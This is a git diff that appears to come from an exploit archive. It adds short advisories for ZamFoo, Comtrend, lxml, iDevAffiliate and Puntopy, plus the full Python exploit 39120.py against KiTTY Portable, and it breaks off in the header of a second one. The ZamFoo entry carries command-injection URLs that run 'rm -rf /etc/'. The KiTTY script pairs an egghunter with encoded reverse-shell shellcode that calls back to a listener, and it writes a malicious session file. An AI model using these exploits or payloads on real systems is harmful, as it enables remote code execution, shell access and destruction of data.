diff --git a/files.csv b/files.csv
index 253b6fcc7..2f33cc2fc 100755
--- a/files.csv
+++ b/files.csv
@@ -35372,9 +35372,10 @@ id,file,description,date,author,platform,type,port
39116,platforms/php/webapps/39116.txt,"GNUboard 4.3x 'ajax.autosave.php' Multiple SQL Injection Vulnerabilities",2014-03-19,"Claepo Wang",php,webapps,0
39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x Multiple Cross Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0
39118,platforms/php/webapps/39118.html,"osCmax 2.5 Cross Site Request Forgery Vulnerability",2014-03-17,"TUNISIAN CYBER",php,webapps,0
-39119,platforms/windows/remote/39119..py,"KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0
-39120,platforms/windows/local/39120..py,"KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
-39122,platforms/windows/local/39122..py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
+39119,platforms/windows/remote/39119.py,"KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0
+39120,platforms/windows/local/39120.py,"KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
+39121,platforms/windows/local/39121.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7)",2015-12-29,"Guillaume Kaddouch",windows,local,0
+39122,platforms/windows/local/39122.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39124,platforms/php/webapps/39124.txt,"MeiuPic 'ctl' Parameter Local File Include Vulnerability",2014-03-10,Dr.3v1l,php,webapps,0
39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security Remote Denial of Service Vulnerability",2014-03-20,CXsecurity,windows,dos,0
39126,platforms/php/webapps/39126.txt,"BIGACE Web CMS 2.7.5 /public/index.php LANGUAGE Parameter Remote Path Traversal File Access",2014-03-19,"Hossein Hezami",php,webapps,0
@@ -35400,3 +35401,8 @@ id,file,description,date,author,platform,type,port
39147,platforms/osx/local/39147.c,"Apple Mac OS X Local Security Bypass Vulnerability",2014-04-22,"Ian Beer",osx,local,0
39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
39152,platforms/linux/shellcode/39152..c,"tcp bindshell with password prompt in 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
+39153,platforms/php/webapps/39153.txt,"iDevAffiliate 'idevads.php' SQL Injection Vulnerability",2014-04-22,"Robert Cooper",php,webapps,0
+39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router password.cgi Admin Password Manipulation CSRF",2014-04-21,"TUNISIAN CYBER",hardware,remote,0
+39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0
+39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
+39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0
diff --git a/platforms/cgi/webapps/39156.txt b/platforms/cgi/webapps/39156.txt
new file mode 100755
index 000000000..dc7b72cbe
--- /dev/null
+++ b/platforms/cgi/webapps/39156.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/67215/info
+
+ZamFoo is prone to multiple remote command-execution vulnerabilities.
+
+Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.
+
+ZamFoo 12.6 is vulnerable; other versions may also be affected.
+
+https://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=|rm -rf /etc/${IFS}
+
+https://www.example.com/cgi/zamfoo/zamfoo_do_change_site_ip.cgi?accounttochange=|rm -rf /etc/|&newip=127.0.0.1&pattern2=
+
+
diff --git a/platforms/hardware/remote/39154.txt b/platforms/hardware/remote/39154.txt
new file mode 100755
index 000000000..ba96bf036
--- /dev/null
+++ b/platforms/hardware/remote/39154.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/67033/info
+
+Comtrend CT-5361T ADSL Router is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.
+
+An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.
+
+Comtrend CT-5361T firmware version A111-312SSG-T02_R01 is vulnerable; other versions may also be affected.
+
+http://www.example.com/password.cgi?sysPassword=[Your Password]
\ No newline at end of file
diff --git a/platforms/linux/remote/39155.txt b/platforms/linux/remote/39155.txt
new file mode 100755
index 000000000..ff5b43d7b
--- /dev/null
+++ b/platforms/linux/remote/39155.txt
@@ -0,0 +1,47 @@
+source: http://www.securityfocus.com/bid/67159/info
+
+lxml is prone to a security-bypass vulnerability.
+
+An attacker can leverage this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks.
+
+Versions prior to lxml 3.3.5 are vulnerable.
+
+from lxml.html.clean import clean_html
+
+html = '''\
+
+
+
+aaa
+bbb
+bbb
+bbb
+bbb
+bbb
+bbb
+bbb
+bbb
+bbb
+
+'''
+
+print clean_html(html)
+
+
+Output:
+
+
diff --git a/platforms/php/webapps/39153.txt b/platforms/php/webapps/39153.txt
new file mode 100755
index 000000000..2c59f44b1
--- /dev/null
+++ b/platforms/php/webapps/39153.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/67031/info
+
+iDevAffiliate is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+iDevAffiliate 5.0 and prior are vulnerable.
+
+http://www.example.com/idevaffiliate/idevads.php?id=6&ad=[SQLi]
\ No newline at end of file
diff --git a/platforms/php/webapps/39157.txt b/platforms/php/webapps/39157.txt
new file mode 100755
index 000000000..b5ea3a46c
--- /dev/null
+++ b/platforms/php/webapps/39157.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/67241/info
+
+Puntopy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/novedad.php?id=[SQL Injection]
\ No newline at end of file
diff --git a/platforms/windows/local/39120.py b/platforms/windows/local/39120.py
new file mode 100755
index 000000000..8a3e9a2b0
--- /dev/null
+++ b/platforms/windows/local/39120.py
@@ -0,0 +1,412 @@
+# Exploit Title: KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP, DoS 7/8.1/10)
+# Date: 28/12/2015
+# Exploit Author: Guillaume Kaddouch
+# Twitter: @gkweb76
+# Blog: http://networkfilter.blogspot.com
+# GitHub: https://github.com/gkweb76/exploits
+# Vendor Homepage: http://www.9bis.net/kitty/
+# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe
+# Version: 0.65.0.2p
+# Tested on: Windows XP SP3 x86 (FR), Windows 7 Pro x64 (FR), Windows 8.1 Pro x64 (FR), Windows 10 Pro x64 (FR)
+# Category: Local
+
+
+"""
+Disclosure Timeline:
+--------------------
+2015-09-13: Vulnerability discovered
+2015-09-26: Vendor contacted
+2015-09-28: Vendor answer
+2015-10-09: KiTTY 0.65.0.3p released, still vulnerable
+2015-10-20: KiTTY 0.65.1.1p released, still vulnerable
+2015-11-15: KiTTY 0.66.6.1p released, seems fixed
+2015-12-28: exploit published
+
+Description :
+-------------
+A local overflow exists in the session file used by KiTTY portable, in the HostName parameter. It is possible to write
+an overly long string to trigger an overflow. It can be used to trigger code execution on Windows XP SP3, or to crash
+the program from Windows 7 to Windows 10. It has been tested with KiTTY portable 0.65.0.2p/0.65.0.3p/0.65.1.1p, but earlier versions are
+likely to be vulnerable too.
+
+WinXP -> Local Code Execution
+Win7 -> Denial Of Service
+Win8.1 -> Denial Of Service
+Win10 -> Denial Of Service
+
+Instructions:
+-------------
+- Run exploit
+- Launch KiTTY, select "EvilSession" on the session list, then click "Load".
+
+Exploitation:
+-------------
+When writing a 1500 bytes string to the HostName parameter in a session file, EIP is overwritten at offset 1232.
+As ESP points to our buffer, we use an address doing a JMP ESP in an unprotected DLL. However, as the memory area
+we land in is not reliable for bigger shellcode such as reverse shell, using an egg hunter is required. The final
+shellcode is written into another session parameter, LogFileName. After successful exploitation, a reverse shell
+is given if this payload has been selected on Windows XP SP3 (on Windows 7/8.1/10, KiTTY crashes):
+
+guillaume@kali64:~/tools$ nc -nlvp 4444
+listening on [any] 4444 ...
+connect to [192.168.135.131] from (UNKNOWN) [192.168.135.130] 1955
+Microsoft Windows XP [version 5.1.2600]
+(C) Copyright 1985-2001 Microsoft Corp.
+
+C:\kitty\App\KiTTY>
+
+"""
+
+egg = "w00t" # \x77\x30\x30\x74
+
+# Windows NtAccessCheckAndAuditAlarm EggHunter
+# Size: 32 bytes
+egghunter = (
+"\x66\x81\xca\xff\x0f" # or dx,0x0fff
+"\x42" # inc edx
+"\x52" # push edx
+"\x6a\x02" # push byte +0x02
+"\x58" # pop eax
+"\xcd\x2e" # int 0x2e
+"\x3c\x05" # cmp al,0x5
+"\x5a" # pop edx
+"\x74\xef" # jz 0x0
+"\xb8\x77\x30\x30\x74" # mov eax,0x74303077 ; egg
+"\x8b\xfa" # mov edi,edx
+"\xaf" # scasd
+"\x75\xea" # jnz 0x5
+"\xaf" # scasd
+"\x75\xe7" # jnz 0x5
+"\xff\xe7" # jmp edi
+)
+
+# Metasploit Reverse Shell 192.168.135.131:4444 (replace it with any shellcode you want)
+# Encoder: x86/shikata_ga_nai
+# Bad chars: '\x00\x0a\x0d\x5c'
+# Size: 351 bytes
+shellcode = (
+"\xb8\xa9\xbf\xda\xcb\xdd\xc0\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
+"\x52\x83\xee\xfc\x31\x46\x0e\x03\xef\xb1\x38\x3e\x13\x25\x3e"
+"\xc1\xeb\xb6\x5f\x4b\x0e\x87\x5f\x2f\x5b\xb8\x6f\x3b\x09\x35"
+"\x1b\x69\xb9\xce\x69\xa6\xce\x67\xc7\x90\xe1\x78\x74\xe0\x60"
+"\xfb\x87\x35\x42\xc2\x47\x48\x83\x03\xb5\xa1\xd1\xdc\xb1\x14"
+"\xc5\x69\x8f\xa4\x6e\x21\x01\xad\x93\xf2\x20\x9c\x02\x88\x7a"
+"\x3e\xa5\x5d\xf7\x77\xbd\x82\x32\xc1\x36\x70\xc8\xd0\x9e\x48"
+"\x31\x7e\xdf\x64\xc0\x7e\x18\x42\x3b\xf5\x50\xb0\xc6\x0e\xa7"
+"\xca\x1c\x9a\x33\x6c\xd6\x3c\x9f\x8c\x3b\xda\x54\x82\xf0\xa8"
+"\x32\x87\x07\x7c\x49\xb3\x8c\x83\x9d\x35\xd6\xa7\x39\x1d\x8c"
+"\xc6\x18\xfb\x63\xf6\x7a\xa4\xdc\x52\xf1\x49\x08\xef\x58\x06"
+"\xfd\xc2\x62\xd6\x69\x54\x11\xe4\x36\xce\xbd\x44\xbe\xc8\x3a"
+"\xaa\x95\xad\xd4\x55\x16\xce\xfd\x91\x42\x9e\x95\x30\xeb\x75"
+"\x65\xbc\x3e\xd9\x35\x12\x91\x9a\xe5\xd2\x41\x73\xef\xdc\xbe"
+"\x63\x10\x37\xd7\x0e\xeb\xd0\x18\x66\x74\xa3\xf1\x75\x7a\xb5"
+"\x5d\xf3\x9c\xdf\x4d\x55\x37\x48\xf7\xfc\xc3\xe9\xf8\x2a\xae"
+"\x2a\x72\xd9\x4f\xe4\x73\x94\x43\x91\x73\xe3\x39\x34\x8b\xd9"
+"\x55\xda\x1e\x86\xa5\x95\x02\x11\xf2\xf2\xf5\x68\x96\xee\xac"
+"\xc2\x84\xf2\x29\x2c\x0c\x29\x8a\xb3\x8d\xbc\xb6\x97\x9d\x78"
+"\x36\x9c\xc9\xd4\x61\x4a\xa7\x92\xdb\x3c\x11\x4d\xb7\x96\xf5"
+"\x08\xfb\x28\x83\x14\xd6\xde\x6b\xa4\x8f\xa6\x94\x09\x58\x2f"
+"\xed\x77\xf8\xd0\x24\x3c\x08\x9b\x64\x15\x81\x42\xfd\x27\xcc"
+"\x74\x28\x6b\xe9\xf6\xd8\x14\x0e\xe6\xa9\x11\x4a\xa0\x42\x68"
+"\xc3\x45\x64\xdf\xe4\x4f"
+)
+
+junk = '\x41' * 1232
+ret = '\x7B\x46\x86\x7C' # 0x7C86467B / jmp esp / kernel32.dll
+nops = '\x90' * 8
+eggmark = egg * 2
+padding = '\x42' * (1500 - len(junk) - len(ret) - len(egghunter))
+
+payload1 = junk + ret + egghunter + padding # Egg Hunter
+payload2 = eggmark + nops + shellcode # Final Shellcode
+
+# A whole KiTTY session file, written to \Sessions\EvilSession"
+buffer = "PortKnocking\\\\\r"
+buffer += "ACSinUTF\\0\\\r"
+buffer += "Comment\\\\\r"
+buffer += "CtrlTabSwitch\\0\\\r"
+buffer += "Password\\1350b\\\r"
+buffer += "ForegroundOnBell\\0\\\r"
+buffer += "SaveWindowPos\\0\\\r"
+buffer += "WindowState\\0\\\r"
+buffer += "TermYPos\\-1\\\r"
+buffer += "TermXPos\\-1\\\r"
+buffer += "LogTimeRotation\\0\\\r"
+buffer += "Folder\\Default\\\r"
+buffer += "AutocommandOut\\\\\r"
+buffer += "Autocommand\\\\\r"
+buffer += "LogTimestamp\\\\\r"
+buffer += "AntiIdle\\\\\r"
+buffer += "ScriptfileContent\\\\\r"
+buffer += "Scriptfile\\\\\r"
+buffer += "SFTPConnect\\\\\r"
+buffer += "IconeFile\\\\\r"
+buffer += "Icone\\1\\\r"
+buffer += "SaveOnExit\\0\\\r"
+buffer += "Fullscreen\\0\\\r"
+buffer += "Maximize\\0\\\r"
+buffer += "SendToTray\\0\\\r"
+buffer += "TransparencyValue\\0\\\r"
+buffer += "zDownloadDir\\C%3A%5C\\\r"
+buffer += "szOptions\\-e%20-v\\\r"
+buffer += "szCommand\\\\\r"
+buffer += "rzOptions\\-e%20-v\\\r"
+buffer += "rzCommand\\\\\r"
+buffer += "CygtermCommand\\\\\r"
+buffer += "Cygterm64\\0\\\r"
+buffer += "CygtermAutoPath\\1\\\r"
+buffer += "CygtermAltMetabit\\0\\\r"
+buffer += "HyperlinkRegularExpression\\(((https%3F%7Cftp)%3A%5C%2F%5C%2F)%7Cwww%5C.)(([0-9]+%5C.[0-9]+%5C.[0-9]+%5C.[0-9]+)%7Clocalhost%7C([a-zA-Z0-9%5C-]+%5C.)%2A[a-zA-Z0-9%5C-]+%5C.(com%7Cnet%7Corg%7Cinfo%7Cbiz%7Cgov%7Cname%7Cedu%7C[a-zA-Z][a-zA-Z]))(%3A[0-9]+)%3F((%5C%2F%7C%5C%3F)[^%20%22]%2A[^%20,;%5C.%3A%22%3E)])%3F\\\r"
+buffer += "HyperlinkRegularExpressionUseDefault\\1\\\r"
+buffer += "HyperlinkBrowser\\\\\r"
+buffer += "HyperlinkBrowserUseDefault\\1\\\r"
+buffer += "HyperlinkUseCtrlClick\\1\\\r"
+buffer += "HyperlinkUnderline\\0\\\r"
+buffer += "FailureReconnect\\0\\\r"
+buffer += "WakeupReconnect\\0\\\r"
+buffer += "SSHManualHostKeys\\\\\r"
+buffer += "ConnectionSharingDownstream\\1\\\r"
+buffer += "ConnectionSharingUpstream\\1\\\r"
+buffer += "ConnectionSharing\\0\\\r"
+buffer += "WindowClass\\\\\r"
+buffer += "SerialFlowControl\\1\\\r"
+buffer += "SerialParity\\0\\\r"
+buffer += "SerialStopHalfbits\\2\\\r"
+buffer += "SerialDataBits\\8\\\r"
+buffer += "SerialSpeed\\9600\\\r"
+buffer += "SerialLine\\COM1\\\r"
+buffer += "ShadowBoldOffset\\1\\\r"
+buffer += "ShadowBold\\0\\\r"
+buffer += "WideBoldFontHeight\\0\\\r"
+buffer += "WideBoldFontCharSet\\0\\\r"
+buffer += "WideBoldFontIsBold\\0\\\r"
+buffer += "WideBoldFont\\\\\r"
+buffer += "WideFontHeight\\0\\\r"
+buffer += "WideFontCharSet\\0\\\r"
+buffer += "WideFontIsBold\\0\\\r"
+buffer += "WideFont\\\\\r"
+buffer += "BoldFontHeight\\0\\\r"
+buffer += "BoldFontCharSet\\0\\\r"
+buffer += "BoldFontIsBold\\0\\\r"
+buffer += "BoldFont\\\\\r"
+buffer += "ScrollbarOnLeft\\0\\\r"
+buffer += "LoginShell\\1\\\r"
+buffer += "StampUtmp\\1\\\r"
+buffer += "BugChanReq\\0\\\r"
+buffer += "BugWinadj\\0\\\r"
+buffer += "BugOldGex2\\0\\\r"
+buffer += "BugMaxPkt2\\0\\\r"
+buffer += "BugRekey2\\0\\\r"
+buffer += "BugPKSessID2\\0\\\r"
+buffer += "BugRSAPad2\\0\\\r"
+buffer += "BugDeriveKey2\\0\\\r"
+buffer += "BugHMAC2\\0\\\r"
+buffer += "BugIgnore2\\0\\\r"
+buffer += "BugRSA1\\0\\\r"
+buffer += "BugPlainPW1\\0\\\r"
+buffer += "BugIgnore1\\0\\\r"
+buffer += "PortForwardings\\\\\r"
+buffer += "RemotePortAcceptAll\\0\\\r"
+buffer += "LocalPortAcceptAll\\0\\\r"
+buffer += "X11AuthFile\\\\\r"
+buffer += "X11AuthType\\1\\\r"
+buffer += "X11Display\\\\\r"
+buffer += "X11Forward\\0\\\r"
+buffer += "BlinkText\\0\\\r"
+buffer += "BCE\\1\\\r"
+buffer += "LockSize\\0\\\r"
+buffer += "EraseToScrollback\\1\\\r"
+buffer += "ScrollOnDisp\\1\\\r"
+buffer += "ScrollOnKey\\0\\\r"
+buffer += "ScrollBarFullScreen\\0\\\r"
+buffer += "ScrollBar\\1\\\r"
+buffer += "CapsLockCyr\\0\\\r"
+buffer += "Printer\\\\\r"
+buffer += "UTF8Override\\1\\\r"
+buffer += "CJKAmbigWide\\0\\\r"
+buffer += "LineCodePage\\\\\r"
+buffer += "Wordness224\\2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,2,2,2\\\r"
+buffer += "Wordness192\\2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,2,2,2\\\r"
+buffer += "Wordness160\\1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1\\\r"
+buffer += "Wordness128\\1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1\\\r"
+buffer += "Wordness96\\1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1\\\r"
+buffer += "Wordness64\\1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2\\\r"
+buffer += "Wordness32\\0,1,2,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1,1\\\r"
+buffer += "Wordness0\\0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0\\\r"
+buffer += "MouseOverride\\1\\\r"
+buffer += "RectSelect\\0\\\r"
+buffer += "MouseIsXterm\\0\\\r"
+buffer += "PasteRTF\\0\\\r"
+buffer += "RawCNP\\0\\\r"
+buffer += "Colour33\\187,187,187\\\r"
+buffer += "Colour32\\0,0,0\\\r"
+buffer += "Colour31\\187,187,187\\\r"
+buffer += "Colour30\\0,187,187\\\r"
+buffer += "Colour29\\187,0,187\\\r"
+buffer += "Colour28\\0,0,187\\\r"
+buffer += "Colour27\\187,187,0\\\r"
+buffer += "Colour26\\0,187,0\\\r"
+buffer += "Colour25\\187,0,0\\\r"
+buffer += "Colour24\\0,0,0\\\r"
+buffer += "Colour23\\0,0,0\\\r"
+buffer += "Colour22\\187,187,187\\\r"
+buffer += "Colour21\\255,255,255\\\r"
+buffer += "Colour20\\187,187,187\\\r"
+buffer += "Colour19\\85,255,255\\\r"
+buffer += "Colour18\\0,187,187\\\r"
+buffer += "Colour17\\255,85,255\\\r"
+buffer += "Colour16\\187,0,187\\\r"
+buffer += "Colour15\\85,85,255\\\r"
+buffer += "Colour14\\0,0,187\\\r"
+buffer += "Colour13\\255,255,85\\\r"
+buffer += "Colour12\\187,187,0\\\r"
+buffer += "Colour11\\85,255,85\\\r"
+buffer += "Colour10\\0,187,0\\\r"
+buffer += "Colour9\\255,85,85\\\r"
+buffer += "Colour8\\187,0,0\\\r"
+buffer += "Colour7\\85,85,85\\\r"
+buffer += "Colour6\\0,0,0\\\r"
+buffer += "Colour5\\0,255,0\\\r"
+buffer += "Colour4\\0,0,0\\\r"
+buffer += "Colour3\\85,85,85\\\r"
+buffer += "Colour2\\0,0,0\\\r"
+buffer += "Colour1\\255,255,255\\\r"
+buffer += "Colour0\\187,187,187\\\r"
+buffer += "SelectedAsColour\\0\\\r"
+buffer += "UnderlinedAsColour\\0\\\r"
+buffer += "BoldAsColourTest\\1\\\r"
+buffer += "DisableBottomButtons\\1\\\r"
+buffer += "WindowHasSysMenu\\1\\\r"
+buffer += "WindowMaximizable\\1\\\r"
+buffer += "WindowMinimizable\\1\\\r"
+buffer += "WindowClosable\\1\\\r"
+buffer += "BoldAsColour\\1\\\r"
+buffer += "Xterm256Colour\\1\\\r"
+buffer += "ANSIColour\\1\\\r"
+buffer += "TryPalette\\0\\\r"
+buffer += "UseSystemColours\\0\\\r"
+buffer += "FontVTMode\\4\\\r"
+buffer += "FontQuality\\0\\\r"
+buffer += "FontHeight\\10\\\r"
+buffer += "FontCharSet\\0\\\r"
+buffer += "FontIsBold\\0\\\r"
+buffer += "Font\\Courier%20New\\\r"
+buffer += "TermHeight\\24\\\r"
+buffer += "TermWidth\\80\\\r"
+buffer += "WinTitle\\\\\r"
+buffer += "WinNameAlways\\1\\\r"
+buffer += "DisableBidi\\0\\\r"
+buffer += "DisableArabicShaping\\0\\\r"
+buffer += "CRImpliesLF\\0\\\r"
+buffer += "LFImpliesCR\\0\\\r"
+buffer += "AutoWrapMode\\1\\\r"
+buffer += "DECOriginMode\\0\\\r"
+buffer += "ScrollbackLines\\10000\\\r"
+buffer += "BellOverloadS\\5000\\\r"
+buffer += "BellOverloadT\\2000\\\r"
+buffer += "BellOverloadN\\5\\\r"
+buffer += "BellOverload\\1\\\r"
+buffer += "BellWaveFile\\\\\r"
+buffer += "BeepInd\\0\\\r"
+buffer += "Beep\\1\\\r"
+buffer += "BlinkCur\\0\\\r"
+buffer += "CurType\\0\\\r"
+buffer += "WindowBorder\\1\\\r"
+buffer += "SunkenEdge\\0\\\r"
+buffer += "HideMousePtr\\0\\\r"
+buffer += "FullScreenOnAltEnter\\0\\\r"
+buffer += "AlwaysOnTop\\0\\\r"
+buffer += "Answerback\\KiTTY\\\r"
+buffer += "LocalEdit\\2\\\r"
+buffer += "LocalEcho\\2\\\r"
+buffer += "TelnetRet\\1\\\r"
+buffer += "TelnetKey\\0\\\r"
+buffer += "CtrlAltKeys\\1\\\r"
+buffer += "ComposeKey\\0\\\r"
+buffer += "AltOnly\\0\\\r"
+buffer += "AltSpace\\0\\\r"
+buffer += "AltF4\\1\\\r"
+buffer += "NetHackKeypad\\0\\\r"
+buffer += "ApplicationKeypad\\0\\\r"
+buffer += "ApplicationCursorKeys\\0\\\r"
+buffer += "NoRemoteCharset\\0\\\r"
+buffer += "NoDBackspace\\0\\\r"
+buffer += "RemoteQTitleAction\\1\\\r"
+buffer += "NoRemoteWinTitle\\0\\\r"
+buffer += "NoAltScreen\\0\\\r"
+buffer += "NoRemoteResize\\0\\\r"
+buffer += "NoMouseReporting\\0\\\r"
+buffer += "NoApplicationCursors\\0\\\r"
+buffer += "NoApplicationKeys\\0\\\r"
+buffer += "LinuxFunctionKeys\\0\\\r"
+buffer += "RXVTHomeEnd\\0\\\r"
+buffer += "BackspaceIsDelete\\1\\\r"
+buffer += "PassiveTelnet\\0\\\r"
+buffer += "RFCEnviron\\0\\\r"
+buffer += "RemoteCommand\\\\\r"
+buffer += "PublicKeyFile\\\\\r"
+buffer += "SSH2DES\\0\\\r"
+buffer += "SshProt\\3\\\r"
+buffer += "SshNoShell\\0\\\r"
+buffer += "GSSCustom\\\\\r"
+buffer += "GSSLibs\\gssapi32,sspi,custom\\\r"
+buffer += "AuthGSSAPI\\1\\\r"
+buffer += "AuthKI\\1\\\r"
+buffer += "AuthTIS\\0\\\r"
+buffer += "SshBanner\\1\\\r"
+buffer += "SshNoAuth\\0\\\r"
+buffer += "RekeyBytes\\1G\\\r"
+buffer += "RekeyTime\\60\\\r"
+buffer += "KEX\\dh-gex-sha1,dh-group14-sha1,dh-group1-sha1,rsa,WARN\\\r"
+buffer += "Cipher\\aes,blowfish,3des,WARN,arcfour,des\\\r"
+buffer += "ChangeUsername\\0\\\r"
+buffer += "GssapiFwd\\0\\\r"
+buffer += "AgentFwd\\0\\\r"
+buffer += "TryAgent\\1\\\r"
+buffer += "Compression\\0\\\r"
+buffer += "NoPTY\\0\\\r"
+buffer += "LocalUserName\\\\\r"
+buffer += "UserNameFromEnvironment\\0\\\r"
+buffer += "UserName\\\\\r"
+buffer += "Environment\\\\\r"
+buffer += "ProxyTelnetCommand\\connect%20%25host%20%25port%5Cn\\\r"
+buffer += "ProxyPassword\\\\\r"
+buffer += "ProxyUsername\\\\\r"
+buffer += "ProxyPort\\80\\\r"
+buffer += "ProxyHost\\proxy\\\r"
+buffer += "ProxyMethod\\0\\\r"
+buffer += "ProxyLocalhost\\0\\\r"
+buffer += "ProxyDNS\\1\\\r"
+buffer += "ProxyExcludeList\\\\\r"
+buffer += "AddressFamily\\0\\\r"
+buffer += "TerminalModes\\CS7=A,CS8=A,DISCARD=A,DSUSP=A,ECHO=A,ECHOCTL=A,ECHOE=A,ECHOK=A,ECHOKE=A,ECHONL=A,EOF=A,EOL=A,EOL2=A,ERASE=A,FLUSH=A,ICANON=A,ICRNL=A,IEXTEN=A,IGNCR=A,IGNPAR=A,IMAXBEL=A,INLCR=A,INPCK=A,INTR=A,ISIG=A,ISTRIP=A,IUCLC=A,IXANY=A,IXOFF=A,IXON=A,KILL=A,LNEXT=A,NOFLSH=A,OCRNL=A,OLCUC=A,ONLCR=A,ONLRET=A,ONOCR=A,OPOST=A,PARENB=A,PARMRK=A,PARODD=A,PENDIN=A,QUIT=A,REPRINT=A,START=A,STATUS=A,STOP=A,SUSP=A,SWTCH=A,TOSTOP=A,WERASE=A,XCASE=A\\\r"
+buffer += "TerminalSpeed\\38400,38400\\\r"
+buffer += "TerminalType\\xterm\\\r"
+buffer += "TCPKeepalives\\0\\\r"
+buffer += "TCPNoDelay\\1\\\r"
+buffer += "PingIntervalSecs\\0\\\r"
+buffer += "PingInterval\\0\\\r"
+buffer += "WarnOnClose\\1\\\r"
+buffer += "CloseOnExit\\1\\\r"
+buffer += "PortNumber\\22\\\r"
+buffer += "Protocol\\ssh\\\r"
+buffer += "SSHLogOmitData\\0\\\r"
+buffer += "SSHLogOmitPasswords\\1\\\r"
+buffer += "LogFlush\\1\\\r"
+buffer += "LogFileClash\\-1\\\r"
+buffer += "LogType\\0\\\r"
+buffer += "LogFileName\\" + payload2 + "\\\r" # Shellcode
+buffer += "HostName\\" + payload1 + "\\\r" # Egg Hunter
+buffer += "Present\\1\\\r"
+buffer += "LogHost\\\\\r"
+
+# Location of our evil session file (modify with your KiTTY directory)
+file = "C:\\kitty\\App\\KiTTY\\Sessions\\EvilSession"
+try:
+ print "\n[*] Writing to %s (%s bytes)" % (file, len(buffer))
+ f = open(file,'w')
+ f.write(buffer)
+ f.close()
+ print "[*] Done!"
+except:
+ print "[-] Error writing %s" % file
\ No newline at end of file
diff --git a/platforms/windows/local/39121.py b/platforms/windows/local/39121.py
new file mode 100755
index 000000000..cdcd026c8
--- /dev/null
+++ b/platforms/windows/local/39121.py
@@ -0,0 +1,304 @@
+# Exploit Title: KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7)
+# Date: 28/12/2015
+# Exploit Author: Guillaume Kaddouch
+# Twitter: @gkweb76
+# Blog: http://networkfilter.blogspot.com
+# GitHub: https://github.com/gkweb76/exploits
+# Vendor Homepage: http://www.9bis.net/kitty/
+# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe
+# Version: 0.65.0.2p
+# Tested on: Windows 7 Pro x64 (FR)
+# Category: Local
+
+"""
+Disclosure Timeline:
+--------------------
+2015-09-18: Vulnerability discovered
+2015-09-26: Vendor contacted
+2015-09-28: Vendor answer
+2015-10-09: KiTTY 0.65.0.3p released : unintentionally (vendor said) preventing exploit from working, without fixing the core vulnerability
